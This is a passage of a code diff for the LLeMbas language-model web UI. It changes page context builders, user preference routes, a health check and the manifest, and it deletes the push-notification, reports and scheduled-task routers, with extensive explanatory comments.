# be put back or there would be no way to turn it on again.
for gate in off:
seen.setdefault(gate, "")
families = [
{
"gate": gate,
"label": _GATE_LABELS.get(gate) or tool_labels.label_for(example) or gate,
"on": gate not in off,
}
for gate, example in sorted(seen.items())
]
skills = []
if permissions.has(db, user, "library.use"):
skills = [
{
"name": skill.name,
"description": skill.description,
"on": skill.name not in skills_off,
}
for skill in skills_service.enabled_for(db, user)
]
for name in sorted(skills_off):
if name not in {s["name"] for s in skills}:
skills.append({"name": name, "description": "", "on": False})
# What this chat has been told to stop asking about. Shown so the list
# cannot grow invisibly: every entry is one click of "Always allow this" on
# a card, and a standing permission nobody can see is one nobody can revoke.
return {
"scope_families": families,
"scope_skills": skills,
"scope_allow": list(tools_service.scoped_allow(chat)),
# Which of the two menus to draw: switches that POST at once, or
# switches that ride along with the first message. The template asks
# this rather than `chat is None`, so the reason is named where the
# difference is.
"scope_prospective": prospective,
}
# What a gate is called in the menu. A gate covers several tools, so no single
# tool's label is the right name for it.
_GATE_LABELS = {
"web_search": "Web search",
"fetch": "Fetching pages",
"knowledge": "Your knowledge library",
"notes": "Notes",
"memory": "Memory",
"skills": "Skills",
"ask": "Asking you questions",
"scratch": "Writing in the canvas",
"image": "Generating images",
"report": "Filing reports",
"schedule": "Scheduling work",
"subagent": "Sending helpers",
"agent": "Running commands",
"custom": "Custom tools",
"mcp": "MCP servers",
}
def _agent_context(db: DBSession, user: User, chat: Chat | None) -> dict:
"""What the composer and the chat header need to know about agent chats.
`agent_profiles` is empty unless every one of the conditions holds -- the
feature is on, the reader may run commands, and they have a usable
connection -- which is what makes the picker appear only when choosing it
would lead anywhere.
"""
from lembas.db.models import SshProfile
from lembas.services.agent import hosts
from lembas.services.agent import policy as agent_policy
profiles: list[SshProfile] = []
if settings_store.agents(db).get("enabled") and permissions.has(db, user, "tools.agent"):
profiles = [
profile
for profile in db.scalars(
select(SshProfile)
.where(SshProfile.owner_id == user.id, SshProfile.enabled.is_(True))
.order_by(SshProfile.name)
)
# A connection pointing at this machine that an administrator has not
# allowed is not offered at all. `session.resolve` refuses it too and
# is the control; this is so it never appears in a picker whose only
# outcome is an agent chat with no tools and nothing said about why.
if hosts.usable(db, profile)
]
current = None
if chat is not None and chat.ssh_profile_id:
current = db.get(SshProfile, chat.ssh_profile_id)
if current is not None and current.owner_id != user.id:
current = None
elif chat is None and profiles:
# The new-chat screen. Which connection is *chosen* is a decision being
# made in the browser, so the server cannot know it -- what it can say is
# that there is one to choose, which is all the panels need in order to
# exist. They are pointed at a target by `lembas:agent-target`, and show
# nothing until they are.
#
# This says the panels may *exist*, never that they should be *offered*.
# The two buttons render `hidden` here and are shown by the same event,
# because the kind toggle and the connection select are both in the
# browser: answering with `profiles[0]` and leaving it at that offered a
# terminal on an ordinary chat with nothing selected, and pressing it
# opened a panel that could not work.
current = profiles[0]
return {
"agent_profiles": profiles,
"agent_profile": current,
"agent_modes": [
(m, agent_policy.MODE_LABELS[m], agent_policy.MODE_HINTS[m])
for m in agent_policy.MODES
],
"terminal_enabled": _terminal_enabled(db, user, chat, current),
# Whether this chat could have background jobs at all. Not whether it
# has any -- that is what the chip's own request answers, five seconds
# later, off the request path. A chip that can never show anything is a
# chip that only takes room in a row this codebase has already had to
# fight to keep on one line.
"jobs_enabled": _jobs_enabled(db, user, chat, current),
# Any chat that exists. Deliberately not gated the way the terminal is:
# half the canvas's sources -- notes, skills, this chat's attachments,
# its own scratch document -- need no machine at all, so the terminal's
# total gate would remove a working feature because one source is
# unavailable. Absent on the new-chat screen for the reason the scope
# menu is: there is no row yet to hang a tab on.
# Also before the chat exists, where it opens on the connection being
# chosen in the composer. That reverses an earlier decision -- "there is
# no row yet to hang a tab on" -- which was true of the *storage* and
# was never a reason to withhold the panel: a draft holds its tabs in
# memory and hands them over when the chat is created. See
# services/agent/draft.py.
"canvas_enabled": chat is not None or bool(profiles),
# And whether it may *also* reach project files. Re-derived server-side
# on every canvas request; this flag only decides what the panel offers.
"canvas_agent": canvas_service.agent_ready(db, user, chat) is not None,
}
def _jobs_enabled(db: DBSession, user: User, chat: Chat | None, profile) -> bool:
"""Whether background jobs are possible in this chat.
The same shape as `_terminal_enabled` and for the same reason, but keyed on
`background_enabled` rather than on `terminal_enabled` and on `tools.agent`
rather than `agent.terminal` -- somebody who may have a model run commands
here may see which of them are still running. It is not a second permission,
because there is no action here the agent tools do not already grant.
"""
from lembas.db.models import KIND_AGENT
from lembas.services.agent import ssh as ssh_service
if chat is None or chat.kind != KIND_AGENT or profile is None:
return False
if not permissions.has(db, user, "tools.agent"):
return False
values = settings_store.agents(db)
if not values.get("enabled") or not values.get("background_enabled"):
return False
return ssh_service.available() == ""
def _terminal_enabled(db: DBSession, user: User, chat: Chat | None, profile) -> bool:
"""Whether this chat can offer a shell of its own.
Every condition, not a subset: the button loads 280KB of terminal and opens
a socket, so one that cannot work is worse than none. `ssh.available()` is
in here because an instance that installed LLeMbas without the `ssh` extra
would otherwise render a button whose only outcome is an error frame.
"""
from lembas.db.models import KIND_AGENT
from lembas.services.agent import ssh as ssh_service
# `chat is None` is the new-chat screen, which may open a shell on the
# connection being chosen there. Everything else still has to hold.
if profile is None or (chat is not None and chat.kind != KIND_AGENT):
return False
if not permissions.has(db, user, "agent.terminal"):
return False
values = settings_store.agents(db)
if not values.get("enabled") or not values.get("terminal_enabled", True):
return False
return ssh_service.available() == ""
def sidebar_kind(user: User) -> str:
"""Which side of the sidebar's switch this user last chose.
One resolver, because the page, the fragment route and the switch's own
pressed state all have to agree about it. Anything unrecognised -- an older
release's value, a hand-edited row -- reads as ordinary chats rather than
showing an empty sidebar nobody can explain.
"""
chosen = (user.settings_json or {}).get("sidebar_kind")
return chosen if chosen in KINDS else KIND_CHAT
def sidebar_context(db: DBSession, user: User) -> dict:
"""Folder tree plus the chats that belong to no folder.
@@ -348,78 +70,29 @@ def sidebar_context(db: DBSession, user: User) -> dict:
Only root folders are queried; children come through the relationship and
render recursively in the template.
Everything is narrowed to one `Chat.kind`. A folder the filter has emptied
is dropped here rather than in the template, so the "Folders" heading cannot
appear above nothing -- the same reason `visible_chats` moved off the
template in the first place. `shown_in` is what draws that line: a folder
that was empty to begin with is kept, on both sides.
"""
# With the switch absent the sidebar goes back to showing everything, rather
# than to one side of a fork nobody can move. An administrator turning agent
# chats off would otherwise strand whoever last left the switch on Agents in
# a sidebar that is empty with no way out of it.
split = permissions.has(db, user, "agent.ssh") and bool(
settings_store.agents(db).get("enabled")
)
kind = sidebar_kind(user) if split else ""
folders = [
folder
for folder in db.scalars(
folders = list(
db.scalars(
select(Folder)
.where(Folder.user_id == user.id, Folder.parent_id.is_(None))
.order_by(Folder.position, Folder.name)
)
if folder.shown_in(kind)
]
narrowed = select(Chat).where(
Chat.user_id == user.id,
Chat.folder_id.is_(None),
Chat.archived.is_(False),
Chat.temporary.is_(False),
# `kind` empty means "both sides of the switch", never "no filter" --
# see `Folder.visible_chats`. Task chats and the Messages conversation
# have sections of their own and must never appear in this list, and
# the case that reaches here with "" is precisely an instance with
# agents disabled, where nobody would ever see the leak coming.
Chat.kind.in_((kind,) if kind else KINDS),
)
unfiled = list(
db.scalars(narrowed.order_by(Chat.pinned.desc(), Chat.updated_at.desc()))
db.scalars(
select(Chat)
.where(
Chat.user_id == user.id,
Chat.folder_id.is_(None),
Chat.archived.is_(False),
Chat.temporary.is_(False),
)
.order_by(Chat.pinned.desc(), Chat.updated_at.desc())
)
)
return {
"folders": folders,
"unfiled_chats": unfiled,
# The shortcuts at the top of the sidebar. Here rather than in
# `_chat_context`, where they used to be, for two reasons: they are
# sidebar content and the fragment route that re-renders the sidebar has
# only this, and the library and connections pages carry the sidebar
# without ever calling `_chat_context` -- so the shortcuts simply were
# not there on any of them. The picker lists every model in the
# administrator's order, pinned or not; pinning is not ordering.
"pinned_models": [m for m in chat_service.available_models(db, user) if m.pinned],
# Whether the Reports entry starts with its dot showing. Only the first
# paint: from then on `/api/chats/unread` moves it out of band, the same
# deal a chat row's dot has. Counted rather than existence-checked
# because the same query answers both and a count is what a title would
# want if this ever grows one.
"unread_reports": reports_service.unread_count(db, user),
# Read rather than created, for the reason the poll does the same: this
# runs on every page, and `messages.for_user` would write a conversation
# for every account that has never opened the section.
"unread_messages": bool(
db.scalar(
select(Chat.unread).where(
Chat.user_id == user.id, Chat.kind == KIND_MESSAGES
)
)
),
"sidebar_kind": kind,
# Whether the switch is worth showing at all. A two-way switch with one
# useful side is worse than no switch: it offers a view that is empty by
# construction and cannot be made otherwise.
"sidebar_split": split,
"can": permissions.resolve(db, user),
}
@@ -435,32 +108,6 @@ async def home(user: RequiredUser):
# has by definition no server to ask who is looking at it.
@router.get("/healthz", include_in_schema=False)
async def healthz() -> Response:
"""Is the process up and can it reach its database.
Unauthenticated, like the three below, and for a fourth reason: a
healthcheck that needed a session would be a healthcheck nothing could run.
It says nothing about *what* is here -- no version, no counts -- because it
is reachable without signing in and a health endpoint is a common place to
leak the first fact an attacker wants.
The query is what makes it worth having. A process that is up with a
database it cannot open answers every page with a 500, and a check that only
proved the socket was listening would call that healthy.
"""
from sqlalchemy import text
from lembas.db.session import session_scope
try:
with session_scope() as db:
db.execute(text("SELECT 1"))
except Exception: # noqa: BLE001 - the answer is the status code
return JSONResponse({"status": "error"}, status_code=503)
return JSONResponse({"status": "ok"})
@router.get("/manifest.webmanifest", include_in_schema=False)
async def manifest(db: Db) -> Response:
"""The web app manifest.
@@ -470,31 +117,19 @@ async def manifest(db: Db) -> Response:
else would be wrong on the one screen that is hardest to correct: the
launcher.
"""
brand = branding_service.for_db(db)
icons = brand.icon_paths
name = settings_store.get(db, "instance_name") or "LLeMbas"
return JSONResponse(
{
"id": "/",
"name": brand.name,
"short_name": brand.name[:12],
"description": brand.tagline or "A web UI for your language models.",
"name": name,
"short_name": name[:12],
"description": "A web UI for your language models.",
"start_url": "/chat",
"scope": "/",
"display": "standalone",
"background_color": THEME_COLOUR["moria"],
"theme_color": THEME_COLOUR["moria"],
# An uploaded logo's derived icons, or the shipped ones. Whole-set
# rather than per size: a manifest listing two custom icons and one
# shipped is a launcher tile that changes when the device picks a
# different size, which reads as a bug in the install.
"icons": [
{"src": f"/branding/{icons['icon-192']}", "sizes": "192x192",
"type": "image/png", "purpose": "any"},
{"src": f"/branding/{icons['icon-512']}", "sizes": "512x512",
"type": "image/png", "purpose": "any"},
{"src": f"/branding/{icons['maskable']}", "sizes": "512x512",
"type": "image/png", "purpose": "maskable"},
] if icons.get("icon-192") and icons.get("icon-512") and icons.get("maskable") else [
{"src": "/static/img/icon-192.png", "sizes": "192x192",
"type": "image/png", "purpose": "any"},
{"src": "/static/img/icon-512.png", "sizes": "512x512",
@@ -533,52 +168,22 @@ async def offline(request: Request) -> Response:
@router.get("/chat")
async def chat_index(
request: Request,
db: Db,
user: RequiredUser,
model: str = "",
temporary: bool = False,
kind: str = "",
folder: str = "",
request: Request, db: Db, user: RequiredUser, model: str = "", temporary: bool = False
):
"""A composer with no chat behind it yet.
`?model=` preselects one, which is how the pinned shortcuts work without
creating a row for a chat that may never be sent. `?temporary=1` is the
same idea for the temporary flag: it lives in the URL rather than in
JavaScript, so it survives a reload and can be bookmarked. `?kind=agent`
is how the sidebar's Agent side opens a new chat already on that side --
a preselection like the other two, not a decision: the kind is still
chosen on the screen and still fixed only when the first message is sent.
`?folder=` is the same again, and is what "New chat here" on a folder row
posts: the chat is filed there, and `_new_chat` fills in whatever the
folder seeds and the screen left empty.
JavaScript, so it survives a reload and can be bookmarked.
"""
context = _chat_context(db, user, None)
# Somebody else's folder id in the URL is ignored rather than refused. It
# would only ever get there by hand, and an error page holding a composer
# hostage over a bad query string helps nobody.
starting_folder = db.get(Folder, folder) if folder else None
if starting_folder is not None and starting_folder.user_id != user.id:
starting_folder = None
# A folder that fixes the kind picks the fork, unless the URL already said.
if not kind and starting_folder is not None:
kind = starting_folder.kind
# Fall back to the same choice a new chat would make -- the user's default,
# then the instance default, then first in order. Using models[0] here
# instead would show a model the chat is not going to use, which matters:
# the composer decides from it whether to warn that images will be dropped.
preselected = next((m for m in context["models"] if m.model_id == model), None)
# The folder's own model, ahead of the reader's default and behind an
# explicit `?model=`. Same order `_new_chat` applies, so the picker shows
# the model the chat is actually going to be created with -- which matters,
# because the composer decides from it whether to warn about images.
if preselected is None and starting_folder is not None and starting_folder.model_id:
preselected = next(
(m for m in context["models"] if m.model_id == starting_folder.model_id), None
)
if preselected is None:
chosen = chat_service.default_model(db, user)
if chosen is not None:
@@ -598,56 +203,12 @@ async def chat_index(
**context,
"current_model": preselected,
"starting_temporary": temporary,
"starting_kind": kind if kind in KINDS else KIND_CHAT,
"starting_folder": starting_folder,
"suggestions": suggestions_service.visible(db),
**sidebar_context(db, user),
},
)
def _candidate_parents(db: DBSession, user_id: str, folder: Folder) -> list[Folder]:
from lembas.api.folders import candidate_parents
return candidate_parents(db, user_id, folder)
@router.get("/folders/{folder_id}")
async def folder_settings(request: Request, db: Db, user: RequiredUser, folder_id: str):
"""What a folder hands to the chats started inside it.
A page rather than a row that expands, following the admin convention: a
form per row in a tree that nests eight deep would be unusable, and the
sidebar is the one part of the application that has to stay scannable.
Guarded by `folder.manage`, the same permission the whole folder router
carries -- editing a folder's system prompt is managing a folder, and a page
that renders for somebody whose save is going to 403 is a trap.
"""
if not permissions.has(db, user, "folder.manage"):
raise HTTPException(status.HTTP_403_FORBIDDEN, "You cannot manage folders.")
folder = db.get(Folder, folder_id)
if folder is None or folder.user_id != user.id:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That folder no longer exists.")
return render(
request,
"folders/edit.html",
{
"folder": folder,
"chat": None,
# Imported here rather than at module scope: `api.folders` imports
# `api.deps`, which this module is a peer of, and the pair have been
# kept apart deliberately.
"parents": _candidate_parents(db, user.id, folder),
"models": chat_service.available_models(db, user),
**_agent_context(db, user, None),
**sidebar_context(db, user),
},
)
@router.get("/chat/{chat_id}")
async def chat_detail(request: Request, db: Db, user: RequiredUser, chat_id: str):
chat = db.get(Chat, chat_id)
@@ -669,29 +230,23 @@ async def chat_detail(request: Request, db: Db, user: RequiredUser, chat_id: str
# have only stopped being part of the request.
compacted, messages = compaction_service.split(db, chat, everything)
# Empty, and kept only so `_thread.html` and the four handlers that render a
# bubble keep one signature between them. An assistant turn is rendered from
# its steps now (`message_steps`, a Jinja global), which is what lets a
# reply's prose sit either side of the tool call it surrounded rather than
# arriving as one block at the bottom. Nothing reads this for an assistant
# message any more; `library/note_detail.html` has its own.
bodies: dict[str, str] = {}
# Markdown is rendered once here rather than in the template so the same
# helper produces the page and the streamed final frame -- one code path,
# no chance of the two disagreeing.
bodies = {
message.id: render_markdown(message.content)
for message in everything
if message.role == "assistant" and message.content
}
# What the chat would use if its own prompt were empty, so the settings
# panel can show it as placeholder text rather than leaving the user to
# guess what "inherited" means.
#
# This mirrors `chat_service.effective_system_prompt` and has to keep
# mirroring it, layer for layer and in the same order -- a panel naming the
# wrong source is worse than one naming none, because it is believed.
inherited, inherited_from = "", ""
folder_prompt = chat_service.folder_system_prompt(db, chat)
current = next(
(m for m in chat_service.available_models(db, user) if m.model_id == chat.model_id), None
)
if folder_prompt:
inherited, inherited_from = folder_prompt, "folder"
elif current is not None and (current.system_prompt or "").strip():
if current is not None and (current.system_prompt or "").strip():
inherited, inherited_from = current.system_prompt.strip(), "model"
else:
instance_prompt = (settings_store.get(db, "system_prompt") or "").strip()
@@ -708,45 +263,12 @@ async def chat_detail(request: Request, db: Db, user: RequiredUser, chat_id: str
"bodies": bodies,
"inherited_prompt": inherited,
"inherited_from": inherited_from,
**_schedule_context(db, user, chat),
**_chat_context(db, user, chat),
**sidebar_context(db, user),
},
)
def _schedule_context(db: DBSession, user: User, chat: Chat) -> dict:
"""What the strip below a task chat needs.
Empty for every other kind, so the three keys exist unconditionally and the
template can ask about `schedule` without a `default(false)` -- the same
reason `audio_service.template_flags` is passed by all four bubble
renderers rather than by whichever one remembered.
`schedule` being None on a task chat is a real state, not an error: removing
a schedule keeps its chat by default, and the strip says so.
"""
from lembas.services import schedules as schedules_service
if chat is None or chat.kind != KIND_TASK:
return {"schedule": None, "schedule_summary": "", "schedule_next": None}
schedule = schedules_service.for_chat(db, chat)
if schedule is None:
return {"schedule": None, "schedule_summary": "", "schedule_next": None}
zone = clock.zone_for(user)
return {
"schedule": schedule,
"schedule_summary": schedules_service.describe(schedule, owner=user),
"schedule_next": (
clock.as_utc(schedule.next_fire_at).astimezone(zone)
if schedule.next_fire_at
else None
),
}
@router.get("/settings")
async def settings_page(
request: Request,
@@ -776,12 +298,6 @@ async def settings_page(
"voice_error": voice_error,
"memories": memories_service.all_for(db, user),
"memory_limit": memories_service.MAX_MEMORY_CHARS,
# Sorted rather than left in set order, because a list of six
# hundred zones that is not alphabetical is one nobody can use.
"timezones": sorted(available_timezones()),
"timezone": clock.name_for(user),
"server_timezone": str(clock.server_zone()),
"local_now": clock.now_for(user).strftime("%H:%M on %A %-d %B"),
**context,
**sidebar_context(db, user),
},
+2 -107
View File
@@ -12,20 +12,12 @@ from lembas.api.deps import Db, RequiredUser
from lembas.config import settings
from lembas.security.passwords import hash_password, validate_password, verify_password
from lembas.security.sessions import COOKIE_NAME, create_session, revoke_all_for_user
from lembas.services.schedule import clock
log = logging.getLogger(__name__)
router = APIRouter(prefix="/api/preferences", tags=["preferences"])
# The built-in pair used to be spelled out here, and in four other places. It is
# one server-resolved list now, because an administrator can define a theme and a
# hard-coded pair would refuse it -- silently, since this route answers a
# rejection with `{"ok": false}` that nothing displays.
def themes() -> tuple[str, ...]:
from lembas.services import branding
return branding.snapshot().theme_ids
THEMES = ("moria", "shire")
@router.post("/theme")
@@ -36,7 +28,7 @@ async def set_theme(db: Db, user: RequiredUser, theme: str = Body(..., embed=Tru
the choice follow the user to another browser, and what lets the server
render the right theme on first paint instead of flashing the default.
"""
if theme not in themes():
if theme not in THEMES:
return {"ok": False, "detail": "Unknown theme."}
# Replaced rather than mutated in place: SQLAlchemy only reliably detects
@@ -46,103 +38,6 @@ async def set_theme(db: Db, user: RequiredUser, theme: str = Body(..., embed=Tru
return {"ok": True, "theme": theme}
@router.post("/timezone")
async def set_timezone(db: Db, user: RequiredUser, timezone: str = Form("")) -> Response:
"""Which zone this person's schedules fire in, and what time they are told it is.
Empty is a real answer -- "whatever the server is set to" -- rather than an
unset field, which is why it is stored as "" instead of being removed. An
unrecognised name is refused rather than stored and fallen back from later:
a schedule that quietly fires in the wrong zone is the failure this whole
field exists to prevent, and the one place to catch it is the write.
"""
chosen = (timezone or "").strip()
if chosen and not clock.known(chosen):
return RedirectResponse(
"/settings?error=timezone", status_code=status.HTTP_303_SEE_OTHER
)
user.settings_json = {**(user.settings_json or {}), clock.SETTING_KEY: chosen}
db.commit()
return RedirectResponse("/settings?saved=timezone", status_code=status.HTTP_303_SEE_OTHER)
# Which CSS variables a browser is allowed to set from here, and how far. An
# open dict would let a page store anything under somebody's account and have
# it read back on every load; a width outside these bounds would hand them a
# panel they cannot see to drag back.
LAYOUT_BOUNDS = {
"--terminal-width": (384, 2400),
"--canvas-width": (384, 2400),
"--inspector-width": (280, 2400),
"--sidebar-width": (200, 800),
}
@router.post("/layout")
async def set_layout(db: Db, user: RequiredUser, widths: dict = Body(...)) -> dict:
"""Remember how wide somebody dragged the panels.
Same two tiers as the theme: `localStorage` is the truth for the tab that
did the dragging, and this is what carries it to another browser. Unknown
names are dropped rather than refused -- an older browser sending a key a
newer release removed should not fail the request.
"""
kept: dict[str, int] = {}
for name, raw in (widths or {}).items():
bounds = LAYOUT_BOUNDS.get(str(name))
if bounds is None:
continue
try:
value = int(float(raw))
except (TypeError, ValueError):
continue
kept[str(name)] = min(max(value, bounds[0]), bounds[1])
settings = {**(user.settings_json or {})}
settings["layout"] = {**(settings.get("layout") or {}), **kept}
user.settings_json = settings
db.commit()
return {"ok": True, "layout": kept}
@router.post("/sidebar-kind")
async def set_sidebar_kind(
request: Request, db: Db, user: RequiredUser, kind: str = Form("")
) -> Response:
"""Switch the sidebar between ordinary chats and agent chats.
Saves and re-renders in one round trip, because the two cannot be allowed to
disagree: a switch that stored a choice and left the tree showing the other
side would look broken, and re-rendering without storing would lose it on the
next navigation. The tree comes back as a fragment rather than an `HX-Refresh`
-- a full reload is what `api/folders.py` does for a structural change, and it
would throw away the folder open/closed state on every flick of the switch,
which is the same thing `/api/chats/unread` avoids by swapping out of band.
An unrecognised value is refused rather than stored: `sidebar_kind` reads it
back as "chat" anyway, so storing it would be a preference that silently
does nothing.
"""
from lembas.api.pages import sidebar_context
from lembas.db.models import KINDS
from lembas.web.templating import templates
if kind not in KINDS:
return Response(status_code=status.HTTP_400_BAD_REQUEST)
user.settings_json = {**(user.settings_json or {}), "sidebar_kind": kind}
db.commit()
return templates.TemplateResponse(
request,
"partials/_sidebar_tree.html",
# `oob` brings the New chat button along out of band. It sits above the
# scroll area rather than inside the tree, so a swap of the tree alone
# left it saying "New chat" while agent chats were listed underneath.
{"chat": None, "user": user, "oob": True, **sidebar_context(db, user)},
)
@router.post("/default-model")
async def set_default_model(
db: Db, user: RequiredUser, model_id: str = Form("")
-123
View File
@@ -1,123 +0,0 @@
"""Registering a browser for notifications, and letting it go again.
Three routes and no cleverness. The interesting half is `services/push.py`;
this is the part a browser talks to.
Ownership is the whole authorisation, as everywhere a person's own things are
handled here: a subscription belongs to whoever was signed in when it was made,
and nothing else can reach it.
"""
from __future__ import annotations
import logging
from fastapi import APIRouter, Request, Response, status
from sqlalchemy import select
from lembas.api.deps import Db, RequiredUser
from lembas.db.models import PushSubscription
from lembas.services import fetch as fetch_service
from lembas.services import push as push_service
from lembas.services.fetch import FetchError
log = logging.getLogger(__name__)
router = APIRouter(prefix="/api/push", tags=["push"])
# What a browser hands back is its own; these are the bounds that stop a crafted
# POST writing a novel into the row.
MAX_ENDPOINT = 2000
MAX_KEY = 255
@router.get("/key")
async def application_key(db: Db, user: RequiredUser) -> dict[str, str]:
"""The public half of this instance's VAPID key.
A browser needs it to subscribe, and it is public by construction — it is
what every push service is shown on every send. Behind a login anyway,
because there is no reason for it to be readable by anyone who is not about
to use it.
"""
return {"key": push_service.public_key(db)}
@router.post("/subscribe")
async def subscribe(request: Request, db: Db, user: RequiredUser) -> Response:
"""Store what `pushManager.subscribe` handed back.
Idempotent on the endpoint, because a browser that re-subscribes returns the
same one — and two rows for one browser would be two notifications for one
arrival. Re-subscribing also **re-points it at whoever is signed in now**:
the endpoint belongs to the browser, so on a shared machine the second
person to turn notifications on must get them instead of the first, not as
well.
"""
payload = await request.json()
endpoint = str(payload.get("endpoint") or "").strip()[:MAX_ENDPOINT]
keys = payload.get("keys") or {}
p256dh = str(keys.get("p256dh") or "").strip()[:MAX_KEY]
auth = str(keys.get("auth") or "").strip()[:MAX_KEY]
if not endpoint.startswith("https://") or not p256dh or not auth:
return Response(status_code=status.HTTP_400_BAD_REQUEST)
# The endpoint is a URL the browser hands us and the server later POSTs to,
# which makes it the same shape as every other URL a request can name --
# and it was the one outbound client in the codebase not going through the
# SSRF guard. `https://` alone says nothing about *where*: an internal
# address is as valid a URL as Mozilla's push service, and the caller
# triggers delivery themselves by sending a message and closing the tab.
#
# Checked here **and** again before the POST, the split `agent/hosts.py`
# uses: a row can predate a DNS change, and this one is stored.
try:
fetch_service.check_url(endpoint)
except FetchError as exc:
log.warning("refused a push endpoint from %s: %s", user.email, exc.message)
return Response(status_code=status.HTTP_400_BAD_REQUEST)
existing = db.scalars(
select(PushSubscription).where(PushSubscription.endpoint == endpoint)
).first()
if existing is not None:
existing.user_id = user.id
existing.p256dh = p256dh
existing.auth_secret = auth
existing.last_error = ""
else:
db.add(
PushSubscription(
user_id=user.id,
endpoint=endpoint,
p256dh=p256dh,
auth_secret=auth,
label=str(request.headers.get("user-agent") or "")[:200],
)
)
db.commit()
log.info("%s registered a browser for notifications", user.email)
return Response(status_code=status.HTTP_204_NO_CONTENT)
@router.post("/unsubscribe")
async def unsubscribe(request: Request, db: Db, user: RequiredUser) -> Response:
"""Forget one browser.
Answers 204 whether or not there was anything to delete: the browser has
already dropped its own subscription by the time it calls this, and telling
it that the row was missing gives it nothing it could do about it.
"""
payload = await request.json()
endpoint = str(payload.get("endpoint") or "").strip()
row = db.scalars(
select(PushSubscription).where(
PushSubscription.endpoint == endpoint, PushSubscription.user_id == user.id
)
).first()
if row is not None:
db.delete(row)
db.commit()
return Response(status_code=status.HTTP_204_NO_CONTENT)
-122
View File
@@ -1,122 +0,0 @@
"""Reports: a feed of finished work, and one report on its own page.
List-plus-detail, the same shape as the library — and for the same reason, since
an instance running a daily schedule accumulates reports faster than anything
else here.
**There is no composer on either page, and no route below accepts a message.**
That is the whole character of the section rather than an omission: a report is
addressed to the reader and cannot be answered, and the way to be sure of that
is for the machinery that would answer to be absent. Nothing here renders
`chat/_message.html`, so there is no `sse-connect` anywhere on these pages and
nothing on them can start a generation.
"""
from __future__ import annotations
import logging
from fastapi import APIRouter, Depends, HTTPException, Request, status
from fastapi.responses import RedirectResponse, Response
from sqlalchemy import select
from lembas.api.deps import Db, RequiredUser, require_permission
from lembas.api.library import PAGE_SIZE, _page
from lembas.api.pages import sidebar_context
from lembas.db.models import Report
from lembas.security import permissions
from lembas.services import reports as reports_service
from lembas.services import sharing
from lembas.services.library import retrieval
from lembas.services.markdown import render_markdown
from lembas.web.templating import render
log = logging.getLogger(__name__)
router = APIRouter(dependencies=[Depends(require_permission("reports.use"))], tags=["reports"])
@router.get("/reports")
async def reports_list(
request: Request,
db: Db,
user: RequiredUser,
q: str = "",
page: int = 1,
shared: bool = False,
):
"""`shared=1` narrows to reports other people have shared with this reader.
Reports became shareable at the same time as this filter appeared, and the
two arrived together on purpose: a feed that quietly grew somebody else's
work with no way to see only theirs is worse than one that never grew.
"""
if q.strip():
rows = reports_service.search(
db, user, q, limit=PAGE_SIZE, vector=await retrieval.embed_query(db, q)
)
pager = {"page": 1, "pages": 1, "total": len(rows)}
else:
rows, pager = _page(
db,
(
select(Report).where(sharing.only_shared(Report, user))
if shared
else reports_service.visible(user)
).order_by(Report.created_at.desc()),
page,
)
return render(
request,
"reports/index.html",
{
"section": "reports",
"reports": rows,
"q": q,
"shared": shared,
"pager": pager,
**sidebar_context(db, user),
},
)
@router.get("/reports/{report_id}")
async def report_detail(request: Request, db: Db, user: RequiredUser, report_id: str):
report = reports_service.get(db, report_id, user)
if report is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That report is not available.")
# Opening one is what reading it means. Done before rendering so the dot on
# the way in and the dot on the way back to the list agree -- the poller
# would otherwise re-announce a report the reader is looking at.
#
# Only the owner's own reading counts. `unread` is the owner's dot, and
# somebody a report was shared with opening it would otherwise clear a
# notification meant for a person who has not seen it.
if report.owner_id == user.id:
reports_service.mark_read(db, report)
return render(
request,
"reports/detail.html",
{
"section": "reports",
"report": report,
# Model output, through the one path allowed to emit HTML.
"body_html": render_markdown(report.body),
"can_share": permissions.has(db, user, "library.share"),
"is_owner": report.owner_id == user.id,
"share_kind": "report",
"share_id": report.id,
**sidebar_context(db, user),
},
)
@router.post("/api/reports/{report_id}/delete")
async def delete_report(db: Db, user: RequiredUser, report_id: str) -> Response:
# `owned`, not `get`: sharing grants reading, so being able to see a report
# is not being able to delete it out from under the person who filed it.
report = reports_service.owned(db, report_id, user)
if report is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That report is not available.")
reports_service.delete(db, report)
return RedirectResponse("/reports", status_code=status.HTTP_303_SEE_OTHER)
-368
View File
@@ -1,368 +0,0 @@
"""Scheduled: the list, the setup form, and one task chat's controls.
A schedule's own chat is rendered by the ordinary chat page — same transcript,
same tail poller, same canvas — with the composer replaced by a strip of
controls. That is the whole reason `KIND_TASK` reuses `Chat` and `Message`
rather than growing tables of its own.
The rule form here is the **manual** one, and it is not a fallback in the
apologetic sense: it is what makes "an empty override means off" safe for the
compile step in Phase 3. Clearing `task.schedule_compile` must switch off the
*compiling*, not the feature.
"""
from __future__ import annotations
import logging
from datetime import UTC, datetime
from fastapi import APIRouter, Depends, Form, HTTPException, Request, status
from fastapi.responses import RedirectResponse, Response
from lembas.api.deps import Db, RequiredUser, require_permission
from lembas.api.pages import sidebar_context
from lembas.db.models import TARGET_CHAT, TARGET_MESSAGES, TARGET_REPORT, Schedule
from lembas.services import chat as chat_service
from lembas.services import schedules as schedules_service
from lembas.services.schedule import clock, runner
from lembas.services.schedule import rule as rule_service
from lembas.web.templating import render
log = logging.getLogger(__name__)
router = APIRouter(
dependencies=[Depends(require_permission("schedule.use"))], tags=["schedules"]
)
# What the setup form may ask for, in the order they are offered.
OFFERED_TARGETS = (
(TARGET_CHAT, "Its own chat"),
(TARGET_REPORT, "Reports"),
(TARGET_MESSAGES, "Messages"),
)
REPEAT_ONCE = "once"
REPEAT_EVERY = "every"
REPEAT_CALENDAR = "calendar"
def _rule_from_form(form) -> dict:
"""Build a rule dict out of the setup form's fields.
Deliberately builds the *raw* shape and hands it to `rule.validate` rather
than validating here: there is one normaliser, it is total, and it is the
same one a model's compiled output will go through in Phase 3. Two
validators would be two ideas of what a legal schedule is.
"""
repeat = str(form.get("repeat") or REPEAT_ONCE)
raw: dict = {}
when = str(form.get("start_date") or "").strip()
at_time = str(form.get("start_time") or "").strip() or "09:00"
if when:
raw["start"] = f"{when}T{at_time}:00"
if repeat == REPEAT_EVERY:
unit = str(form.get("every_unit") or "hours")
try:
amount = int(form.get("every_amount") or 1)
except (TypeError, ValueError):
amount = 1
raw["every"] = {unit: amount}
# A timer with no start begins now. Said here rather than in the rule
# module, which has no clock by design.
raw.setdefault("start", datetime.now(tz=UTC).isoformat())
elif repeat == REPEAT_CALENDAR:
